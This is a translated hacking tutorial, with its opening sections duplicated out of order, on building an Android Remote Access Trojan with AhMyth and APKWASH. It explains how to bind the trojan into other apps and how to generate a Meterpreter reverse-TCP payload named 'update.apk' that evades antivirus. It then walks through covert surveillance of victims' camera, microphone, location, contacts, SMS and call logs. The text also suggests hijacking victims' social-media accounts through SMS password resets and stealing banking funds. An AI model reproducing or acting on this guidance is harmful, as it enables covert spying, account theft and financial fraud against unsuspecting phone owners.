A complete guide from A to Z, including the crypts of our malware.
In such cases, RAT is often deciphered as Remote Access Trojan, and the direct translation of the English word rat - "rat" - comes in handy here.
AhMyth program for creating RAT for Android consists of two components.
The utility requires a Java virtual machine installed on the computer. You can download it from the official Java website. After that, you need to download the binaries of AhMyth itself. You can find them in the official project repository on GitHub , Assets tab. During the download, I recommend turning off the antivirus so that it does not have enough attack from what is happening.
To create an Android APK file, open the APK Builder tab. The appearance of the constructor for creating a RAT for Android is shown below:
It is very easy to use the AhMyth RAT constructor. In the Source IP window, you must enter the IP address of the attacking machine (this address is then easily calculated \ during the forensic analysis of malware, so I advise you not to forget about anonymity).
In the Source Port field, you can specify the port that will be reserved by the machine for listening for connections. The default port is 42 474.
There is also a Bind With Another Apk option that allows you to bind an APK file to another application.
To do this, check the Bind With Another Apk checkbox, select the required APK and specify the method for integrating the malware into the phone. There are two methods: by running an infected APK, or by restarting your phone after installing the RAT. The authors of the program recommend the second option.
It remains to click the Build button - by default, the infected file is saved to the folder:
C: \ Users \ <Your_Username> \ AhMyth \ Output
Download the APKWASH Tool and clone it in Kali Linux using the following command:
git clone https://github.com/jbreed/apkwash.git
Give the tool execute permissions with the following command:
chmod + x apkwash
We can now use the following command to create a malicious file:
-о | –Output <outfile.apk> Sets the name of the generated APK as well as the output apk file.
-x | –Original <infile.apk> The APK into which the payload will be embedded
-g | –Generate Generate Payload Using Default Values
-n | –Newkey Generate new debug key before signing
-v | –Verbose Do not mask command output
-d | –Debug Leaves / tmp / payload files in place for viewing
-h | –Helpreference information
apkwash -p android / meterpreter / reverse_tcp LHOST = 192.168.0.12 LPORT = 1337 -o update.apk
Now you have a malicious apk file that cannot be detected by your antivirus.
Detect - 0 out of 35. Perfect!
Click on Listen, and if our APK has successfully infected a mobile device, we will see a new connection.
The program also logs all actions in the console located at the bottom of the window. The meaning of the columns in the journal is generally self-evident.
To send an SMS, go to the Send SMS tab, specify the recipient's phone number (TO: // field), and in the Message field, enter the desired message text. After that, all that remains is to press the SEND button.
This function can be used to reset the passwords of the accounts of the owner of the infected device, for example, to hack Vkontakte or Instagram.
You can send a message to any recipient
Viewing a list of messages
Sit back, we're getting started!
Why bother accessing someone else's smartphone?
From banal surveillance of the right person to theft of personal data and funds from banking applications and wallets.How to create a RAT for Android
The term RAT (Remote Access Tool) is used to refer to remote administration utilities. They can be used for good purposes for their intended purpose, such as the popular TeamViewer, or they can be installed by hackers in secret from the user .In such cases, RAT is often deciphered as Remote Access Trojan, and the direct translation of the English word rat - "rat" - comes in handy here.
AhMyth RAT (Remote Access Trojan) is an open source application currently in beta. The tool is aimed at Windows users, but AhMyth sources can be downloaded from GitHub for Unix-like platforms as well.
AhMyth program for creating RAT for Android consists of two components.
- A server application that can be used to control an infected device and create APK files with malicious code. It was created on the Electron framework - a framework developed on the GitHub site for creating simple graphical applications.
- A client APK containing malicious code that allows remote access to an infected Android device. That is, the generated APK file will act as a backdoor.
Installing AhMyth RAT
The server part is very easy to install, especially since the author of the RAT-constructor has laid out binaries for free access. But, if you wish, you can compile it from source. In my case, the tests were run on a virtual machine with Windows 10.The utility requires a Java virtual machine installed on the computer. You can download it from the official Java website. After that, you need to download the binaries of AhMyth itself. You can find them in the official project repository on GitHub , Assets tab. During the download, I recommend turning off the antivirus so that it does not have enough attack from what is happening.
Creating an infected APK
To create an Android APK file, open the APK Builder tab. The appearance of the constructor for creating a RAT for Android is shown below:
It is very easy to use the AhMyth RAT constructor. In the Source IP window, you must enter the IP address of the attacking machine (this address is then easily calculated \ during the forensic analysis of malware, so I advise you not to forget about anonymity).
In the Source Port field, you can specify the port that will be reserved by the machine for listening for connections. The default port is 42 474.
There is also a Bind With Another Apk option that allows you to bind an APK file to another application.
To do this, check the Bind With Another Apk checkbox, select the required APK and specify the method for integrating the malware into the phone. There are two methods: by running an infected APK, or by restarting your phone after installing the RAT. The authors of the program recommend the second option.
It remains to click the Build button - by default, the infected file is saved to the folder:
C: \ Users \ <Your_Username> \ AhMyth \ Output
How not to sleep in front of mobile antiviruses
Bypassing antivirus on Android is one of the most difficult tasks. Well, at least that's how it used to be. There is now a tool called APKWASH that can hide malicious applications from detection by most antiviruses.Download the APKWASH Tool and clone it in Kali Linux using the following command:
git clone https://github.com/jbreed/apkwash.git
Give the tool execute permissions with the following command:
chmod + x apkwash
We can now use the following command to create a malicious file:
-p | –Payload <payload> Sets the payload to be generated by msfvenom.
-о | –Output <outfile.apk> Sets the name of the generated APK as well as the output apk file.
-x | –Original <infile.apk> The APK into which the payload will be embedded
-g | –Generate Generate Payload Using Default Values
-n | –Newkey Generate new debug key before signing
-v | –Verbose Do not mask command output
-d | –Debug Leaves / tmp / payload files in place for viewing
-h | –Helpreference information
apkwash -p android / meterpreter / reverse_tcp LHOST = 192.168.0.12 LPORT = 1337 -o update.apk
Now you have a malicious apk file that cannot be detected by your antivirus.
Detect - 0 out of 35. Perfect!
RAT distribution for Android
How the malware collected by this method is distributed is a separate topic for discussion. I will only note that RAT-infected programs are regularly detected on Google Play, and they are cut out from there just as regularly, which does not prevent malware from appearing in this directory again. In addition, no one has canceled the methods of social engineering. But keep in mind that to activate the RAT after installing the application, you must start or reboot the infected device (depending on the builder settings).Connecting to an infected device
Now you need to go to the Victims tab and drive the same port into the field that we indicated earlier, so that the server waits for connections from infected devices. Again, if you didn't change anything when building the APK, then you don't need to specify anything here either.Click on Listen, and if our APK has successfully infected a mobile device, we will see a new connection.
The program also logs all actions in the console located at the bottom of the window. The meaning of the columns in the journal is generally self-evident.
- Country - the country in which the infected device is operating.
- Manuf is a device manufacturer.
- Model - code or model name of the device.
- Release - the version of the operating system of the infected device (in my case, it's Android 10).
- IP is the device's IP address, and Port is the port through which the infected device connected to the attacking machine.
Using RAT AhMyth
Our attention will be offered a menu of seven items, which gives access to various functions of the program.Camera
First, let's take a look at the Camera section. Select a camera: front (Front) or main (Back) - and you can take a picture by pressing the Snap button.
File manager
The file manager here is not as advanced as in other RATs for Android and Windows, but it's still a very useful thing. With its help, you can at least download the files we need from an infected device. As you can see, the home directory is the root directory and can only be accessed with administrator rights.
Microphone
This function allows you to use the device's microphone in the background and record everything that the phone “hears” for a specified time (in the Seconds window, set the recording duration in seconds by number). Then press Record and wait. The resulting file can be listened to directly in the program window or saved to your machine.
Geo position
In my opinion, this is the most interesting feature of AhMyth. If the transmission of geodata is enabled on the infected device, you will be able to find out the geolocation of a person with an accuracy of ten meters. It is known that inexperienced users very rarely remember this option and leave it enabled. Plus, some applications (the same maps) that use the transfer of geodata will someday force a person to turn on this function.
Contacts
With this function, you can pull out the entire list of contacts that are recorded in the phone. It is possible to download the entire list of contacts to your car.
SMS
Another very interesting section. With it, you can send an SMS to someone or view and download all messages that came to this device.To send an SMS, go to the Send SMS tab, specify the recipient's phone number (TO: // field), and in the Message field, enter the desired message text. After that, all that remains is to press the SEND button.
This function can be used to reset the passwords of the accounts of the owner of the infected device, for example, to hack Vkontakte or Instagram.
You can send a message to any recipient
Viewing a list of messages
Call log
This section allows you to view the list of phone calls. There are four blocks of information about each call: the number with which the infected device contacted; the name of the contact to which this number is associated on the infected device; call duration time (in seconds); type of call (incoming or outgoing).
